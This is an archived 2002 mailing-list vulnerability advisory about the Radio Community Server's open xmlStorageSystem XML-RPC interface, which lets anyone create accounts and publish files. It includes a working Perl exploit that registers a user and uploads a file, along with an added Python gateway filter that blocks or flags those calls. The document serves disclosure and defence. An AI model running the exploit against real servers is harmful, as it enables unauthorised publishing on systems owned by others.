RCS public file sharing vulnerability

From: Gerhard Poul (gpoul@EUNET.AT)
Date: 07/07/02


Date:         Sun, 7 Jul 2002 17:34:36 +0200
From: Gerhard Poul <gpoul@EUNET.AT>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Hi,

This is a vulnerability Andreas and I found about eight weeks ago. This
was then first reported to the vendor and CERT. CERT received it on
5/10/02 at 8:01pm. They haven't yet done anything with it as far as I
can tell. - I haven't received anything from them except for the
automated responses.

I've attached the same description here that I also sent to CERT.
 
Best regards,
Gerhard Poul

CONTACT INFORMATION
===============================================================================

 Name : Gerhard Poul, Andreas Bolka
 E-mail : gpoul at eunet.at, andreas.bolka at gmx.net
 Phone / fax : [removed]
 Affiliation and address:

Have you reported this to the vendor? [yes/no] yes.

        If so, please let us know whom you've contacted:

        Date of your report : 5/9/02
        Vendor contact name : Dave Winer
        Vendor contact phone :
        Vendor contact e-mail : dave@userland.com
        Vendor reference number :

POLICY INFO
===============================================================================

        ___ Do not release my identity to your vendor contact.

TECHNICAL INFO
===============================================================================
If there is a CERT Vulnerability tracking number please put it here
(otherwise leave blank): VU#______.

Please describe the vulnerability.
---------------------------------

This vulnerability makes it possible for an intruder to use the open
SOAP or XML-RPC APIs published at
http://www.soapware.org/xmlStorageSystem to create user accounts and
upload random file data to any server running the Radio Community Server
as published by UserLand Software Inc. at http://rcs.userland.com

What is the impact of this vulnerability?
----------------------------------------

   a) What is the specific impact:

Intruders can publish public files on a server without any special user
permission over a network. - You don't need a user account or anything
else on the target machine to make this work.

   b) How would you envision it being used in an attack scenario:

This vulnerability enables attackers to publicly post files on any
machine running the vulnerable software package.

To your knowledge is the vulnerability currently being exploited?
----------------------------------------------------------------
        [yes/no] no.

If there is an exploitation script available, please include it here.
--------------------------------------------------------------------

#!/usr/bin/perl

use Frontier::Client;
use MIME::Base64 qw(encode_base64);

local($/) = undef; # slurp
$email = "John@test.com";
$name = "John Doe";
$password = "whateveryouwant.com";
$filename = $ARGV[0];

$server = Frontier::Client->new( 'url' => 'http://radiohost/RPC2',
                                 'debug' => 0 );
$file = $server->base64(encode_base64(<>));
# Step 1: remote self-registration; returns the new account's usernum.
$result = $server->call("xmlStorageSystem.registerUser", $email, $name,
                        $password, 81, 0, 0);
$usernum = $result->{'usernum'};

# Step 2: store the slurped file under the fresh account.
$result = $server->call("xmlStorageSystem.saveMultipleFiles", $usernum,
                        $password, [ $filename ], [ $file ]);
$filename = $result->{'urlList'}->[0];

print "New user with ID $usernum has been created\n";
print "File has been uploaded to URI: $filename\n";

Do you know what systems and/or configurations are vulnerable?
-------------------------------------------------------------
        [yes/no] no.

        System :
        OS version :
        Verified/Guessed:

Are you aware of any workarounds and/or fixes for this vulnerability?
--------------------------------------------------------------------
        [yes/no] yes.

There is a setting in the RCS software that restricts remote new user
registrations. - By turning these remote registrations off, which are on
by default, you can work around this problem but it will also restrict
the usefulness of the community server.

OTHER INFORMATION
===============================================================================

This vulnerability is an inherent design flaw of the xmlStorageSystem
XML-RPC or SOAP interface used between a Radio Client and a Radio
Community Server. - It has to be fixed in the specification first to
design a secure solution and every customer should be advised to
shut down their Radio Community Servers immediately.

The vendor has been contacted but does not agree with our vulnerability
analysis.
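The two XML-RPC calls the script above drives, xmlStorageSystem.registerUser and xmlStorageSystem.saveMultipleFiles, can be recognised at an HTTP gateway or log processor in front of /RPC2 before they reach the community server. The following Python is an added example, not code from this advisory or from UserLand: it builds a few constructed request bodies of the same shape the script sends, parses them with the standard library's xmlrpc.client, and applies a policy that mirrors the workaround above (remote registration off by default, file uploads flagged for the server's own credential check). The method names and parameter order come from the script; the sample values, the function names and the verdict labels are assumptions.

```python
import xmlrpc.client

# Method names as used by the advisory's script.
REGISTER = "xmlStorageSystem.registerUser"
SAVE_FILES = "xmlStorageSystem.saveMultipleFiles"


def build_sample_requests():
    """Constructed XML-RPC request bodies (not real captures) of the shape a
    Radio client, or the script above, POSTs to /RPC2. All values are made up."""
    register = xmlrpc.client.dumps(
        ("John@test.com", "John Doe", "whateveryouwant.com", 81, 0, 0),
        methodname=REGISTER,
    )
    upload = xmlrpc.client.dumps(
        (4711, "whateveryouwant.com", ["hello.html"],
         [xmlrpc.client.Binary(b"<h1>hi</h1>")]),
        methodname=SAVE_FILES,
    )
    benign = xmlrpc.client.dumps((), methodname="system.listMethods")
    return [register, upload, benign]


def inspect_request(body, allow_remote_registration=False):
    """Parse one XML-RPC POST body and return a verdict dict.

    verdict: "blocked" (rejected at the gateway), "flagged" (passed on, but
    logged because the server must verify usernum/password itself), or "pass".
    """
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception as exc:  # malformed XML or non-XML-RPC payload
        return {"method": None, "verdict": "blocked",
                "note": "unparseable request body: %s" % exc}

    if method == REGISTER:
        # Remote self-registration is the root of the issue: without the
        # workaround setting, anyone can mint an account with this call.
        email = params[0] if params else "?"
        return {"method": method,
                "verdict": "pass" if allow_remote_registration else "blocked",
                "note": "remote self-registration attempt for %r" % email}

    if method == SAVE_FILES:
        usernum = params[0] if params else "?"
        names = list(params[2]) if len(params) > 2 else []
        return {"method": method, "verdict": "flagged",
                "note": "usernum %s uploads %d file(s): %s"
                        % (usernum, len(names), names)}

    return {"method": method, "verdict": "pass", "note": "other method"}


def audit(bodies, allow_remote_registration=False):
    """Run inspect_request over a batch of bodies, preserving order."""
    return [inspect_request(b, allow_remote_registration) for b in bodies]


if __name__ == "__main__":
    for entry in audit(build_sample_requests()):
        print("%-8s %-40s %s" % (entry["verdict"], entry["method"], entry["note"]))
```

The gateway cannot check the usernum/password pair itself, so saveMultipleFiles is only flagged, not blocked; the point of the policy is that with registerUser blocked, an uploader must already hold an account issued some other way, which is exactly what the advisory's workaround setting achieves.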
